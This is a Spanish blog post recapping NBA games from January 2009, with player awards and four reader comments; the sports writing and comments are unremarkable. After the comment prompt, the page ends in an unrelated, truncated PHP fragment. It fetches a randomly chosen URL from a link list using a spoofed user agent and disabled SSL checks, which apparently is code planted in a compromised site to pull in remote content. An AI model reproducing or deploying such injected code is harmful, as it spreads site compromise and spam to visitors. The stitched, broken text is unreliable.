La crónica (17/1/2009)

18 de January de 2009 por Jabho

Larga jornada de nuevo y es que ya se sabe, días de mucho vispera de nada. Para hoy nos espera una mini jornada, pero nos resarciremos mañana que se celebra el día de Martin Luther King y se disputan muchos partidos y varios a horaríos “europeos”. Vayamos con la jornada de anoche:

Empezamos con los Magic que siguen ganado y, ojo, están de gira por el Oeste lo que aun les da mas valor a su racha de 7 victorias seguidas. En los duelos en la zona Howard volvió a dejar claro quién manda (2ª noche consecutiva de 20 rebotes como quien no quiere la cosa), Nelson también se impuso a Billups y de los aleros mejor no hablamos a pesar de la buena actuación de Kleiza saliendo desde el banco. Orlando se situa segundo de la liga trás los Cavs y Denver a esperar partidos mejores que el de anoche.

Boston ha vuelto a las victorias y ayer muy fácil ante los Nets con Rondo cerca del triple-doble. La cosa es que teníamos claro que los Celtics se recuperarían, pero en su mini crisis ha surgido la mejor versión de Cavs y Magic y para liderar la conferencia van a tener que sudar sangre… ¿merece la pena? Los Nets encadenan 3 derrotas consecutivas.

En otro partido importante los Mavericks ganaron a los Jazz en lo que parece que será un dura pugna por puestos de Play Offs. Venían los de Dallas con 4 derrotas consecutivas pero Utah es su talismán, ya que les han ganado en 9 de los 10 últimos partidos. Y además con Dirk empeñado en ganar se hace mas fácil. Por cierto, ayer Dallas cerró un traspaso con los Bobcats en los que mandaba a Diop y su absurdo contrato de 32$ por 5 años que le firmaron a cambio de Hollins y Carroll. En lo deportivo mas “talento” del que le gusta en la zona para Larry Brown y Dallas se lleva a Carroll que bueno, alguna aportación a base de tiro de 3 puede hacer.

Noche si, noche también le damos cera a Charlotte por el rumbo y el perfil de jugadores que va adquiriendo (y los que va soltando). Ahora se han juntado con un frontcourt de estilistas en las manos de Okafor, Nazr y Diop. Los tableros deben estar temblando. Pero anoche volvieron a ganar, van 3 seguidas, y no andan lejos de los Play Offs. Anoche la victima fue Porland en la prórroga. En Porland Sergio fue titular pero Bayless jugó mas minutos y esto tiene mala pinta para Sergio a medio plazo. Roy no estuvo bien, a Oden le falta mucho para ser un pivot dominante y Rudy no parece en su mejor momento, a pesar del correcto partido de anoche.

En otros partidos San Antonio, ya os decíamos que no dudarais, ganaron a los Bulls y recuperan el 2º puesto del Oeste. Los Hornets vencieron a unos Pistons que están de capa caida y encadenan 5 derrotas seguidas. Los Sixers por contra siguen a los suyo y vencieron a los Knicks donde reapereció, correcto, Gallinari. Iguodala ha anotado 20 o más en 11 de los últimos 14 y a su ritmo Philadelphia se entona. Brand podría volver este mismo lunes, que a ver como le sienta su vuelta al equipo. Los Rockets vencieron con cierta facilidad a los Heat con un 12 de 12 en tiro de Yao ante el poder interior de los de Miami. Suena un Jermaine por Marion que tendría todo el sentido del mundo si no fuera por las dudas que nos deja Jermaine.

Acabamos con la derrota de los Bucks ante los Clippers que acaban con su racha de 12 derrotas seguidas. Lesión de Camby a medidados del último cuarto que esperamos que no sea grave, aunque las imágenes no nos dejan tranquilos.

PREMIOS

MVP: Sensacional anoche, y casi toda la temporada, el aleman Dirk Nowitzki. Si Dallas no está mejor no será porque él no cumpla.

El rookie: No ganó pero fue el único que dió la cara en la derrota de su equipo ante Boston. Brook Lopez acabó con 28 puntos y 10 rebotes jugando enfrente del terror de los novatos.

La sorpresa: Tampoco sirvió para ganar pero dado el flojo año que lleva nos gusta destacar el buen partido de Linas Kleiza. Esperamos más buenos partidos por su parte.

La decepción: Para Nenê que en ningún momento pudo con Howard y jugó uno de los peores partidos de la temporada. El reto era difícil pero los buenos tienen que salir en estos partidos.

El mayor esfuerzo en vano: Para Deron Williams y sus 30 puntos con 9 asistencias en la derrota ante los Mavericks. Otra vez será.

 

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Marion le puede venir muy bien a Toronto para dar versatibilidad en las posiones de 3 y 4. Y si ademas te libras de Jermaine, pues perfecto…

      Citar

  2. MagicJohnson32 dice:
    #2

    Es interesante lo de los Sixers. Supongo que irán introduciendo a Brand poco a poco, puede que incluso desde el banquillo. Están demasiado bien como para hacer cambios bruscos. El nivel durante estas últimas semanas de Andre & Andre ha sido fantástico, parece claro que han de seguir siendo ellos quienes determinen el ritmo de juego y a Brand le toca adaptarse.

    Impresionante también está siendo el nivelazo de Jameer Nelson. Pero vamos, una locura.

    ¿Qué demonios hacen los Bobcats?

      Citar

  3. kantonyo dice:
    #3

    No estoy de acuerdo con que quitarse a Jermaine de en medio sea la solución, y tampoco creo que su aportación haya sido pobre, en la última semana antes de su lesión estos fueron sus números:

    4 partidos
    36 minutos/p
    25 puntos/p
    8 rebotes/p – (3 of)
    2.7 tapones/p
    46/76 60% tiro de campo
    28,5 Eficiencia

    No se yo si nos estamos obcecando en O’neal, y no vemos que habia mejorado bastante en los últimos partidos.

      Citar

  4. Jabho dice:
    #4

    Las dudas de Jermaine son que ya se ha perdido 13 de los 42 partidos. Empezamos por ahí y seguimos porque si, ha jugado 4 partidos buenos, pero 4… Y su mega contrato ha dejado sin margen de movimiento a los Raptors… dicho esto ójala vuelva pronto, no se lesiona y mantenga el nivel que dejó.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>